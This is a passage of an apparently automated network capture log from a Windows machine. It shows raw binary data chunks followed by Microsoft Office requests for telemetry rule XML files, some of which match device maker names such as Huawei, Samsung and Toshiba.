2024-11-23 06:09:32 UTC	16384	IN	Data Raw: 7b a3 92 36 6f e3 fe ef e1 4d 99 2f 37 ba b4 12 6e 5f bf bf f8 2a dc 9b 56 3f 2e 39 27 5f 2b e6 44 df 5b ad 36 66 76 6e f6 65 68 ed d9 27 f2 5b cc f2 7f bf f5 a7 df 45 f6 58 36 c7 77 24 bf ee 53 2e bc d6 93 6b 7d ea 65 bc 13 b4 7b 96 78 d7 ef 7c f5 a3 09 45 f7 d0 96 c6 46 ba 93 6d c5 dc 91 2f fe 87 5b 3a 7e 8d 05 ed f5 c5 c4 30 79 b6 ab 0a aa 42 9f c1 f2 fc cc 6b 29 6d ec d2 04 59 a4 db 36 f5 de 88 9b aa d3 4f be 3f f4 78 e4 b7 86 2f e0 f3 fe fd 72 d4 72 da 99 37 e5 7a 6c 68 c3 a7 cb 07 93 6f 6f e6 7f 13 6f df bb a7 45 f6 a5 d4 2c 2f 2e ae 9e e2 e2 0f df 37 cc 97 6f f7 93 fd 84 5f e2 a8 7c 3f a8 b2 dd 45 b6 0d b2 2c db bf 7c ed ff 00 7c 9f 5a d0 d5 3c 51 2d e5 d3 79 91 c1 e6 2c 2d 12 4c e9 f3 27 f9 ed 5c d1 95 45 2d 56 b6 14 64 b9 6e 64 f8 8a d2 5d 36 d5 Data Ascii: {6oM/7n_*V?.9'_+D[6fvneh'[EX6w$S.k}e{x\|EFm/[:~0yBk)mY6O?x/rr7zlhoooE,/.7o_\|?E,\|\|Z<Q-y,-L'\E-Vdnd]6
2024-11-23 06:09:32 UTC	16384	IN	Data Raw: cd ea 9f 7b f8 aa 8c ed 65 70 5d a9 fe f5 3d 84 4d fe b2 3d b4 8b b5 bf da db 4b 18 6f bd f7 a9 6e 25 d1 b0 8f 6f 99 f2 ff 00 0f f0 51 19 db fe ae 4f f7 e8 8f fd 66 d5 8f 6b 53 d5 d5 64 4d d4 8b 4e fa 8c 87 6f 99 e5 b7 f1 54 ab b5 b7 ff 00 b3 f7 d2 a2 93 e4 93 77 f7 bf ef aa 7e fd b2 26 e9 3e 6d 95 42 7a 16 23 b8 9e de 44 9a d6 79 2d ee 22 da d0 ba 3b 2b 23 76 61 5f 4b 7c 2b f8 e3 67 e2 bf 1a 5b f8 77 54 d2 a4 b1 6b cf 2e 2b 1b b4 7f 37 ce 9b cb 1f 2c bf dd dc db ce ef a0 af 9a 61 95 5b 67 ee f6 ff 00 bf 56 b4 7b 9b 9b 2b e8 6f ad 67 7b 7b 8b 79 96 78 5d 3f 82 44 6c a9 fc 2b 1a 94 a3 35 aa d4 e8 c3 e2 27 4f 5e 87 dd 2d 6e d4 f8 ed 25 64 dd 5c 4f ec e3 f1 2a d3 c6 3a 0d 8e 8b ab 6a 5e 7f 8a 52 19 5a eb 11 ed 59 95 1b 86 cf 46 6d a7 9d b5 ea 0d 1e da f1 e7 Data Ascii: {ep]=M=Kon%oQOfkSdMNoTw~&>mBz#Dy-";+#va_K\|+g[wTk.+7,a[gV{+og{{yx]?Dl+5'O^-n%d\O*:j^RZYFm
2024-11-23 06:09:32 UTC	16384	IN	Data Raw: d9 fc cf de 6d fe ff 00 fb 55 5b fe 59 ee 5f 2f 6a d1 1d ee 69 7b 68 58 de bf 3a ff 00 12 bf cf 42 ed 5d fb be 65 a5 b7 95 be ef 97 f3 53 f6 fc ff 00 ea e9 5c 9d 74 23 59 36 4f f2 c9 52 47 22 89 36 fd d6 a8 e3 fd ec 6f 24 71 ee 6f f6 2a 2f de c5 27 fb 4b 54 95 cb bf 52 cc 9f 27 cb 1f dd d9 4d 84 b3 7c cd e6 79 6d f7 29 b6 bf 2c 7b 64 fb df dc a5 8c fe ef 6b 7c ca df dc a4 c8 e6 e6 1f 70 37 46 fb 7e ea fd fa 1b 77 97 b5 bc bf f6 29 aa 91 34 6e ab e6 6e fe 3a 8d 60 65 ff 00 96 9b a9 ad 86 e5 ca c9 a4 45 f2 f6 ac 9b a9 b8 64 ff 00 96 9f 2f f7 ff 00 da a8 e3 2a bf 2b 7c db bf f1 ca 7a 96 78 fe 5f 9a 93 29 4b 98 55 9f 7c 74 29 89 7e 65 8f e6 a3 7c 5f ea e4 4f 97 fb f4 d9 23 dd f7 7e 6d bf c1 40 96 c4 8d 16 c8 f7 2c 91 d4 6c ff 00 c5 e6 6e 5a 15 b7 7e ee 69 29 Data Ascii: mU[Y_/ji{hX:B]eS\t#Y6ORG"6o$qo/'KTR'M\|ym),{dk\|p7F~w)4nn:`eEd/+\|zx_)KU\|t)~e\|_O#~m@,lnZ~i)
2024-11-23 06:09:32 UTC	16384	IN	Data Raw: 4f b7 8e 05 4f de 79 9f 7e ab 9b a9 32 a7 1e 4e 5e af a9 42 ce c2 78 a0 79 3c cf f6 b6 7d df 9a ae 5b c0 b6 b0 79 72 49 f3 37 cd fe e7 e3 57 2e 02 f9 1f 2f 97 b9 7f bf ef 54 e4 45 9a 4f 2e 3f bc c8 cd 51 cf cc f5 34 8c 22 9d bd 34 f5 2b 35 bb 4b fb c6 9e 35 8d 7e 6d ef bb e7 5f f8 0d 58 b7 f2 13 64 71 fc ca bf c6 9f 32 bd 67 cd 67 73 14 9e 5c 72 49 f2 fd f7 a9 2c cc f0 4f e5 cd 26 e5 6f b8 ff 00 c4 95 6e 3e 66 14 ea 39 3e 57 16 bb 9a 10 c7 14 10 4d 34 7f 77 fb ff 00 c5 fe 45 36 34 5f f9 69 fd cf bf 4d 86 4d 9f 32 cf f2 fd df 9d 2a 8c d2 4a 9a 97 f7 61 fe 04 7f d2 92 5c cd 9a 54 52 a3 08 f2 ad 0b 91 c1 12 c7 e5 af cd 1e ff 00 b9 b3 e6 a8 e4 0b f2 46 d1 fc db ea 48 46 f8 f7 79 92 6e d9 f7 29 91 ce bf 7a 4f 2d b7 6e fb 9f de ed 52 af a9 b4 66 f9 53 93 d1 e8 Data Ascii: OOy~2N^Bxy<}[yrI7W./TEO.?Q4"4+5K5~m_Xdq2ggs\rI,O&on>f9>WM4wE64_iMM2*Ja\TRFHFyn)zO-nRfS
2024-11-23 06:09:32 UTC	16384	IN	Data Raw: 9a a3 99 ff 00 79 f2 c9 f3 6f a2 33 b6 44 dd 46 c2 d1 0b 1c 73 bc 0e ab fc 3f f8 e5 3d 7e 48 f6 f9 9f 2f de a8 e1 32 ec 99 5a 49 3f e0 14 aa 3c af 97 ef 32 fd cf c6 93 d5 95 1d 76 25 93 6a 47 bb f8 be eb d3 63 89 5b f7 9e 66 dd b4 f5 45 f2 ff 00 79 f3 52 6c 89 64 7d b2 49 ba 81 0b 1f cd b1 69 32 eb f7 7e 5a 74 61 5a 45 55 f9 55 7f 8e ad 2d bf 91 fb cf 32 08 be 46 6a 4e 56 2b 95 25 72 15 91 96 4f f6 5b fb f4 b3 4e c9 03 c7 1f ca df 2f dc a9 96 df 7c 6e d1 df c7 2c df dc 4f ee fa 6e aa 12 5c 4a d7 4e d3 47 f3 2b ff 00 72 a5 bb 8a 3a ea 3e ea ed 5a 3f f9 68 bb 7e 5f f6 77 0a a9 34 92 ac 7f de 66 7f 93 fd da b1 0c 7b be 66 82 3f 2f f8 12 a4 c4 0d b1 bf 7f 2a ec fb 94 95 87 28 d9 69 b9 4e d4 b7 ee 64 68 e4 6d 8e ad ff 00 01 ad 2d 60 d8 ad f5 c4 9a 7f 99 f6 57 Data Ascii: yo3DFs?=~H/2ZI?<2v%jGc[fEyRld}Ii2~ZtaZEUU-2FjNV+%rO[N/\|n,On\JNG+r:>Z?h~_w4f{f?/*(iNdhm-`W
2024-11-23 06:09:32 UTC	16384	IN	Data Raw: e8 55 bb a6 f8 82 ce d6 d6 6f b4 79 9f 68 d9 fe 8e e8 9b b6 37 f1 37 3f 76 b0 e4 70 d6 2b e4 11 b4 34 ec 66 c9 17 db 63 6d be 5f 98 bb 55 13 f8 ab 2a f2 29 60 93 6b 49 22 c8 bf dc 8e bb 9b 7b 2f ed dd 29 d9 a7 82 de f2 2f f8 f7 9b 66 df 3b e5 fb ad 5c b6 b9 1c f7 10 43 6e d1 ff 00 a4 44 fb 76 7d ef 9b a6 29 d3 ad cd 27 1e a8 20 e3 2d 88 ed 67 89 a3 f3 a3 82 4f b9 b5 f6 7f 76 ba 7f 0c eb 13 c5 04 36 70 c7 1c b1 bb ab 3a 4c 9b 9b fe 03 e8 76 d7 14 b7 b3 f9 ff 00 2c 7b 59 7e 5d 95 a1 a0 cd fe 94 92 49 e6 2b 2f cd be 1f bd ba b4 a9 4f 9d 34 c7 28 72 6a 76 17 d6 91 36 a4 fe 5c 10 44 db 37 6c 87 fb ab fe f5 51 d6 34 7f b7 7f a6 4d 77 1c 50 af fb 1f 37 3e c3 ef 55 6d 5a e2 e6 d6 fa df 52 59 3e 56 f9 52 6d fb b7 ff 00 f5 fe b5 7e 6b f9 6e 20 f3 21 f9 59 be 54 74 Data Ascii: Uoyh77?vp+4fcm_U*)`kI"{/)/f;\CnDv})' -gOv6p:Lv,{Y~]I+/O4(rjv6\D7lQ4MwP7>UmZRY>VRm~kn !YTt
2024-11-23 06:09:32 UTC	16067	IN	Data Raw: 5f 97 b3 e7 d9 f2 fe 35 9d 6f 1a a4 7e 64 7f eb 19 ff 00 9d 51 ad d3 57 8a d4 75 bc 6d 15 de eb 3f 3d 61 6f 99 ff 00 bd bb e9 5a 53 5e ad bc 08 d6 f3 ce b3 6c ff 00 48 df 4e d1 f4 a6 bd d4 ad e3 9b f7 56 b7 0f f7 ff 00 89 f1 fc 4b ea d5 d5 5a f8 43 fb 3a 3f 31 ae e3 6b 8f 39 9b c9 b8 4f de ed fe f6 3d fd 2b 3a 95 a2 9d ba 8e 52 51 f8 de e7 21 0a 2c 73 c3 24 7f eb 37 ee 47 fe 1f a5 5f 9a ca 55 b5 4b cf 2f e5 67 f9 d1 13 6b 3f ad 77 da 6e 9f e1 c9 ed 66 8e 4d 0b ec b1 cb f2 c3 76 9b 99 91 87 f7 59 fe e3 6e fc 2b 8f be b2 d4 22 82 e2 de 6b b9 1b 6c cd b3 e7 f4 ac a3 5b 9d db f3 31 a8 9c a4 f5 33 a3 bb 8a de 37 6f b0 46 cb e7 7f cb c7 de f5 c6 2b a4 5d 6e c5 ed 52 3b af 2f 6c 49 f3 ff 00 13 25 56 f0 5a 4b 04 ff 00 6a ba 8e c6 e2 16 fd d2 45 76 9b 95 fd 7a 57 Data Ascii: _5o~dQWum?=aoZS^lHNVKZC:?1k9O=+:RQ!,s$7G_UK/gk?wnfMvYn+"kl[137oF+]nR;/lI%VZKjEvzW
2024-11-23 06:09:32 UTC	16384	IN	Data Raw: ad 5a 35 7f b9 63 3a b4 bf 77 e5 3b 5b 1f 8d 4c b1 54 60 9a 94 84 a3 1e 66 e2 ee cc 8d 43 51 96 2b 17 f2 63 91 6e 19 16 27 9b 7f f0 ff 00 bb 56 34 9d 5e 4d 2e 1b 8b 88 7c cf b9 1b 3c 33 3b 6d dd ef 9a 7c 7a 54 ba 75 f4 df da 50 48 df 67 dd e7 7c 9b be 5f 55 c7 0d 5d 3f 86 ed 2c ee 24 b7 9a 1b 0b af 2d 53 f7 d3 6c 59 77 c7 d7 0f e9 f4 15 8c ab 42 10 da e8 8b 46 50 f2 7a 1e 7b 6f 22 cf a8 dc 4d 35 c7 90 d2 ee 6b 8f 27 6f cf 9f 6a bd 78 ba 45 fe 86 de 5d a4 9f 6e 8b e6 4f 2b e6 de bf dd 7c d7 43 27 c3 7b 65 8e ee 6b 5b e8 3c 99 7e 6b 44 86 7f de c3 fe fa 3f de 5a e6 57 4b bc b2 91 2e 21 93 ed 56 ed f7 dd df 6e cc 7f b3 56 ab d2 9c b4 90 54 71 e5 4a f6 6b f2 33 fc 1f 1b 25 f7 98 b2 46 d1 c5 f7 ed f7 ed f3 97 fb bb bf 87 eb 5d 37 88 b5 d5 8a 0f 2e 1d 36 08 a4 Data Ascii: Z5c:w;[LT`fCQ+cn'V4^M.\|<3;m\|zTuPHg\|_U]?,$-SlYwBFPz{o"M5k'ojxE]nO+\|C'{ek[<~kD?ZWK.!VnVTqJk3%F]7.6
2024-11-23 06:09:32 UTC	16384	IN	Data Raw: 54 62 ad a9 25 f6 a5 e6 c7 b6 4f 2d 99 be fe f4 f9 5d bd 73 5a 76 7a b4 a9 a3 fd 85 a3 82 55 6f e3 99 17 72 67 fb b9 fb b5 91 67 24 0f 7c f2 7d 93 6f c8 df 7d ff 00 9f bd 49 33 c5 e5 cd 32 c7 f7 53 fb ff 00 fa 12 9a b9 52 8b d3 b0 7b 39 38 f2 f5 bd cd 1d 27 55 96 0d 55 23 f3 e7 fb 2b 7e ea 68 61 7f 99 ff 00 d9 dd 5d 8c 9a af 86 ae bf 77 ab 68 57 4a cd 34 71 7d a2 19 d5 5b fb bc e3 39 02 bc fe c6 e3 74 7b 7c bb 55 8d 7e 5d ff 00 2e ef fb ea b4 3c 3f 33 45 a9 42 d7 1e 5a c7 71 f2 f9 d7 1f c1 9f e2 6f a5 71 62 30 6a 4f 9b 54 d2 e8 ec 3f 67 cc b4 d0 ee af b4 bd 2b ec 37 16 ed 22 5c 7d ab 72 c2 88 fb 59 d5 1b 3f 2c a0 ed c8 eb b4 f5 a9 b5 af 10 6a 3a 1d aa 47 a8 58 47 71 a6 aa 2a da 5f 22 2b 4e 8a dd 0e ec 7f 7a a9 ea 5a 46 a1 75 a6 c3 67 a7 ea da 6d d4 96 17 Data Ascii: Tb%O-]sZvzUorgg$\|}o}I32SR{98'UU#+~ha]whWJ4q}[9t{\|U~].<?3EBZqoqb0jOT?g+7"\}rY?,j:GXGq*_"+NzZFugm

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.6	49793	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:32 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:32 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 6a83a5f2-e01e-000c-157b-3b8e36000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060932Z-174c587ffdf9xbcchC1TEBxkz4000000029000000000mcqz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:32 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.6	49792	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:32 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:32 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: be70ec4e-301e-000c-088c-3a323f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060932Z-174c587ffdfb74xqhC1TEBhabc00000002e000000000kxyq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:32 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.6	49796	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:32 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:32 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: db42c49d-901e-007b-4a2f-3cac50000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060932Z-178bfbc474bgvl54hC1NYCsfuw00000003z000000000fkrk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:32 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.6	49794	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:32 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:32 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: 9906faf6-f01e-0052-624b-3c9224000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060932Z-15b8b599d88hd9g7hC1TEBp75c00000002g0000000009470 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:32 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.6	49795	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:32 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:32 UTC	491	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:32 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: 4246a62e-c01e-008e-5315-3d7381000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060932Z-178bfbc474bwlrhlhC1NYCy3kg000000044g000000002wsn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-23 06:09:32 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.6	49798	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:36 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:36 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:36 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 65766a9d-a01e-0002-6d8c-3a5074000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060936Z-178bfbc474b9xljthC1NYCtw9400000003y000000000cm76 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:36 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.6	49799	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:36 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:36 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:36 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: 3ac3f4da-f01e-001f-4c47-3c5dc8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060936Z-178bfbc474brk967hC1NYCfu6000000003w0000000007f58 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
